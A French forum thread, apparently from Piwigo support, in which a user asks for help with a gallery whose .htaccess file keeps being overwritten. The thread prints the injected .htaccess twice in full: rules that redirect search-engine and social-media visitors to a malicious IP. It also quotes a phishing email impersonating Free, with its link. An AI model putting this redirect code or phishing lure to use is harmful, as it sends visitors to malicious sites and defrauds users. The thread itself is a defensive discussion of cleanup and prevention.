Est ce que tu as autre chose que ta galerie qui tourne sur l'espace ?

Piwigo ne modifie pas le fichier .htaccess en fonctionnement normal

Se qui est possible c'est que tu es un virus :-(

si tu est chez free et que tu n'as que Piwigo dans le fichier .htaccess, il ne devrais y avoir que php1

C'est un virus donc.
http://www.ip-adress.com/whois/188.229.90.142

Aussi il conviendra de désinfecter votre serveur. Dites-nous, quel est votre client FTP ?

Effectivement  c'est inquiétant et très pénible aujourdui encore le fichier a été modifier et a rendu une n'eme fois la galerie indisponible

le client <FTP est Filezilla

voici le fichier a nouveau modifier
php 1
RewriteEngine On
ErrorDocument 400 http://188.229.90.142/index.php?sa=00
ErrorDocument 401 http://188.229.90.142/index.php?sa=00
ErrorDocument 403 http://188.229.90.142/index.php?sa=00
ErrorDocument 404 http://188.229.90.142/index.php?sa=00
ErrorDocument 500 http://188.229.90.142/index.php?sa=00
ErrorDocument 502 http://188.229.90.142/index.php?sa=00
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://188.229.90.142/index.php?sa=00 [R=301,L]

concernant les identifiants j'ai toujours utiliser ce serveur sans aucun problème j'avais même une php web gallerie il y'a de cela deux ou trois ans donc ...???

qui plus est free ne donne pas accès au log ftp.

Dernière modification par IIV6R32II (2010-12-26 14:16:38)

Juste pour savoir, ça donne quoi si on suit les liens ?

Dans le même article, les conseils :

How to prevent re-infection?

Well, I still don’t know how all those site got infected. All I can suggest is common sense measures:

- Make sure your own computer is virus- and spyware-free. The most common function of trojans is stealing passwords.

- Use SFTP instead of FTP if possible. While FTP sends all data (including passwords) in clear text, SFTP encrypts everything making it almost impossible to intercept critical data.

- Change FTP and other passwords you use on the compromised web server. The new passwords should be strong (at least 7 characters long) and hard to guess.

- Scan your web server directories for suspicious files. Hackers could have left backdoor scripts.
Make sure only you can create/modify files on server. Directories should have 755 permissions and files 644 permissions. Such permissions will prevent hackers from modifying your server files via security holes in web scripts. If you don’t use .htaccess file, just create an empty read-only file (644) – don’t give hackers a chance to create it for you.

- Contact your hosting provider and ask them to investinate the issue. Ideally you do it before modifying the .htaccess file, so that they can find traces left by hackers.

ddtddt a écrit:

Ce qui serais merveilleux c'est que tu nous traduise en français ce que cela vaux dire ;-)

Ok, mais sans garantie "littérale" - aidé par Google ! -

Comment faire pour empêcher la ré-infection? [entre crochets, mes commentaires]

Eh bien, je ne sais toujours pas comment tous ces sites ont été infectés. Tout ce que je peux suggérer, ce sont des mesures de bon sens:

- Assurez-vous que votre propre ordinateur [celui avec lequel vous accéder à votre serveur par FTP] ne contient aucun virus et spyware. La fonction la plus classique des chevaux de Troie est de récupérer les mots de passe.

- Utiliser si possible un FTP sécurisé au lieu d'un FTP. FTP envoie toutes les données (mots de passe y compris) en texte clair, un "SFTP" chiffre tout en rendant pratiquement impossible d'intercepter les données critiques.
[Je crois me souvenir d'un piratage de site Piwigo où le piratage s'était effectué en récupérant le mot de passe Fillezilla sur l'ordinateur de l'utilisateur et non sur le serveur - Le mot de passe Fillezilla n'est pas crypté sur l'ordinateur utilisateur - Ne pas demander à Fillezilla de le conserver d'une session à l'autre]

- Changer vos mots de passe FTP et les mots de passe que vous utilisez sur le serveur web attaqué. Le nouveau mot de passe doit être renforcé (au moins 7 caractères) et difficile à deviner.

- Analysez votre répertoire de serveurs Web pour les fichiers suspects. Les pirates auraient pu laisser des scripts utilisant une "porte dérobée". [port ouvert, j'imagine]

- Assurez-vous que vous pouvez créer / modifier des fichiers sur le serveur.
Les répertoires doivent avoir les autorisations 755 et les fichiers 644 autorisations. [Est-ce possible chez Free et compatible avec les maj automatiques de Piwigo ?]
Ces autorisations empêcher les pirates de la modification de votre serveur de fichiers via les failles de sécurité dans les scripts web.
Si vous n'utilisez pas de fichier htaccess, il suffit de créer un fichier vide en lecture seule (644) - ne pas donner aux pirates la possibilité de le créer à votre place.

- Communiquez avec votre fournisseur d'hébergement et de leur demander d'analyser le problème. Idéalement, faites le avant de modifier le fichier htaccess., afin qu'ils puissent trouver des traces laissées par les pirates. [vous avez gardé des copies, c'est l'essentiel]

j'ai supprimer la galerie par prudence temporairement car rien n'empêchait la ré ecriture du fichier en question

en ce qui concerne les permissions, il est évident que le chmod ne permettait pas l'editon des fichiers distant mais la lecture seule simplement ..


@Gotcha merci , mais j'ai déja passé en revue l'ennsemeble des scripts et pages web sans rien y trouver

j'avais effectivement modifier un des header afin de le rendre plus personnel mais je ne pense pas que cela soit la cause de tous ces maux...

à lheure ou j'écrit la galerie n'étant plus en ligne, je viens d'y retrouver encore ce malheureux fichier ht acces avec la même adresse ip
Options -Indexes
RewriteEngine On
ErrorDocument 400 http://188.229.90.142/index.php?sa=00
ErrorDocument 401 http://188.229.90.142/index.php?sa=00
ErrorDocument 403 http://188.229.90.142/index.php?sa=00
ErrorDocument 404 http://188.229.90.142/index.php?sa=00
ErrorDocument 500 http://188.229.90.142/index.php?sa=00
ErrorDocument 502 http://188.229.90.142/index.php?sa=00
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://188.229.90.142/index.php?sa=00 [R=301,L]

j'ai recu également une tentaive de phishing (assez bien élaboré a dire vrai) sutr la boite mail de l'administration de la galerie :

la voici  :                     // EVIDEMMENT NE REMPLISSER PAS LE FORMULAIRE //

"   
   Sujet : Erreur de soustraction sur votre budget
   
Envoyé par 
"Free Administration" <Email--3mg@Assistance.fr>   Le : 26 Décembre 2010 23:06

À: *******@free.fr
Fichiers joints:   flfl_bg.gif (2.1 ko, télécharger)




Free Administration

Bonjour, cher (e) client (e) :

Apres plusieurs tentatives infructueuses de vous joindre par telephone ,nous vous envoyons ce mail pour vous informer qu une erreur est survenue lors des
prelevements mensuels effectues sur le compte de notre clientele.

En effet le 25 decembre 2010 votre compte a ete indument debite de la somme de (89.00) quatre vingt neuf Euros .

Ce probleme est essentiellement du la similitude de vos noms et prenoms avec ceux d un autre client .

A fin de proceder a un remboursement immediat nous vous prions de bien vouloir cliquer sur le lien ci-dessous et fournir toute information susceptible d accelerer ce remboursement .



Remplissez le formulaire de remboursement en cliquant sur le lien suivant: ttp://www.les50.ch/libraries/geshi/free.frinfo.nl/components/com_virtuemart/shop_image/product/resized/free.fr



Cordialement,

Fabrice Andre,
Directeur Service Client


*En cas de non reponse a ce message, Free decline toute responsabilite
juridique au non remboursement de la somme sus-citee.   "



avec un script en pj (extendu en .gif)

les fautes de syntaxes ne laissent pas dupe mais on se demande réellement si la personne derriere cette petite blague est vraiment en Roumanie comme pourrait le laissé penser le whois ip du fichier ht acces responsable.

Dernière modification par IIV6R32II (2010-12-28 21:45:42)